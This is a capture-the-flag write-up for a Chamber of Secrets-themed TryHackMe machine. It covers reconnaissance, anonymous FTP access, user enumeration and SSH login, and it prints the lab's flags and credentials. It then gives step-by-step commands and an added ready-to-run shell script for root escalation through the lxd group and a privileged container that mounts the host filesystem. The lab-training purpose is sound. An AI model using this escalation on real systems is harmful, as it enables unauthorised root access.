This post is the official write-up for the Chamber of Secrets-themed machine used in Sacramentum CTF. You can find these machines on TryHackMe.
Let's start by deploying the machine, then run a basic Nmap scan to see which ports and services are open on the target IP address.
nmap -sC -sV 10.10.79.75 -vv
In this case, FTP is running, so let's try to connect with the user 'anonymous' and leave the password blank.
Anonymous login works and we find some information on the FTP server: a file (passwd.txt) and two hidden folders ('.GodricGryffindor' and '...').
Let's go ahead and see what the password file contains.
This looks like base64; let's decode it with a base64 decoder.
Looks like we found a possible user - Harry.
The folder '.GodricGryffindor' has a file Sword.txt which contains our first flag 'Ch4mb3r0fS3cr3ts{Al4rt3_A5c3nd@r3}'
Now if we check the '...' folder, there is another passwd.txt file that contains the string '1_4m_Th3_Ch0s3n_0n3', which could be a password.
Trying to connect to FTP and SSH with the tentative user 'Harry' and the password '1_4m_Th3_Ch0s3n_0n3' doesn't get us anywhere.
Let's move on to the Samba service and enumerate it with enum4linux.
No important information here.
No interesting shares are available.
Voila! The user enumeration section lists all the users.
Let's try these users with our password '1_4m_Th3_Ch0s3n_0n3'.
The creds 'h4rry':'1_4m_Th3_Ch0s3n_0n3' work and we log in over SSH, where we find our second flag - 'Ch4mb3r0fS3cr3ts{D3v1Ls_5n4R3}'
After this, while trying basic PrivEsc checks, we find that 'h4rry' is a member of the lxd group. If you don't know about lxd, you can read about it here.
Members of the lxd group can talk to the LXD daemon, which runs as root. That lets us create a privileged container and mount the whole host file system inside it; root inside the container is then root on the host file system, so membership of the lxd group is effectively root.
Commands for the lxd PrivEsc -
ON ATTACKER MACHINE
1. Clone the Alpine image builder
git clone https://github.com/saghul/lxd-alpine-builder
2. cd lxd-alpine-builder
3. Build the image (run as root; this produces an alpine-v*.tar.gz in the current directory)
sudo ./build-alpine
4. Start a web server to transfer the tar file
python3 -m http.server 80 (or python -m SimpleHTTPServer 80 on Python 2)
ON VICTIM MACHINE
1. wget the tar file from the attacker machine
2. Import the image
lxc image import <tar file> --alias privesc
3. Initialize a privileged lxd container (security.privileged=true makes root inside the container root on the host). If lxc complains that no storage pool exists, run lxd init --auto first.
lxc init privesc privesc-container -c security.privileged=true
4. Mount the host file system into the container at /mnt/root
lxc config device add privesc-container mydevice disk source=/ path=/mnt/root recursive=true
5. lxc start privesc-container
6. lxc exec privesc-container /bin/sh
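The victim-side steps above, collected into one script as an added example; this is not code from the original write-up. It assumes the Alpine image tarball built by lxd-alpine-builder has already been downloaded into the directory given by IMAGE_DIR (default: the current directory), that lxd is initialised, and that the current user is in the lxd group. The helper functions (group check, tarball lookup) run on their own; the escalation itself only runs when LXD_PRIVESC_RUN=1 is set, so the script can be reviewed safely before use. The container and alias names are the same hypothetical ones used in the list above.

```shell
#!/bin/sh
# Added example (not part of the original write-up): automates the victim-side
# lxd privilege escalation. Assumes an alpine-v*.tar.gz from lxd-alpine-builder
# is present in $IMAGE_DIR and that lxd is already initialised (lxd init --auto).

# Return 0 if a group list (as printed by `id -Gn`) contains "lxd".
in_lxd_group() {
    # $1: whitespace-separated group names, e.g. "h4rry lxd"
    for g in $1; do
        [ "$g" = "lxd" ] && return 0
    done
    return 1
}

# Print the first image tarball in a directory; the builder names them
# alpine-v<version>-<arch>-<date>.tar.gz. Returns 1 if none is found.
find_image_tar() {
    for f in "$1"/alpine-v*.tar.gz; do
        [ -f "$f" ] && { printf '%s\n' "$f"; return 0; }
    done
    return 1
}

# Run the escalation: import image, create a privileged container with the host
# root filesystem mounted at /mnt/root, start it and drop into a shell.
lxd_privesc() {
    tar="$1"; alias_name="${2:-privesc}"; ctr="${3:-privesc-container}"
    lxc image import "$tar" --alias "$alias_name" || return 1
    # security.privileged=true: uid 0 inside the container is uid 0 on the host.
    lxc init "$alias_name" "$ctr" -c security.privileged=true || return 1
    # Expose the whole host filesystem (writable) inside the container.
    lxc config device add "$ctr" hostroot disk source=/ path=/mnt/root recursive=true || return 1
    lxc start "$ctr" || return 1
    # Inside this shell, the host's /root is at /mnt/root/root.
    lxc exec "$ctr" -- /bin/sh
}

if [ "${LXD_PRIVESC_RUN:-0}" = "1" ]; then
    if ! in_lxd_group "$(id -Gn)"; then
        echo "current user is not in the lxd group" >&2
        exit 1
    fi
    tar=$(find_image_tar "${IMAGE_DIR:-.}") || { echo "no alpine image tar found in ${IMAGE_DIR:-.}" >&2; exit 1; }
    lxd_privesc "$tar"
fi
```

Usage on the victim: `LXD_PRIVESC_RUN=1 IMAGE_DIR=/tmp sh lxd_privesc.sh` after fetching the tarball with wget. The shell it opens is root inside the container; every host file is reachable under /mnt/root, which is why the group check alone is enough to treat this as a root-equivalent finding.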
You can find a detailed explanation of lxd escalation here.
The root flag is in the /mnt/root/root directory (the host's /root seen from inside the container) - 'Ch4mb3r0fS3cr3ts{1_4m_L0rd_V0ld3m0rt}'
If you liked this write-up, there are many more like it here.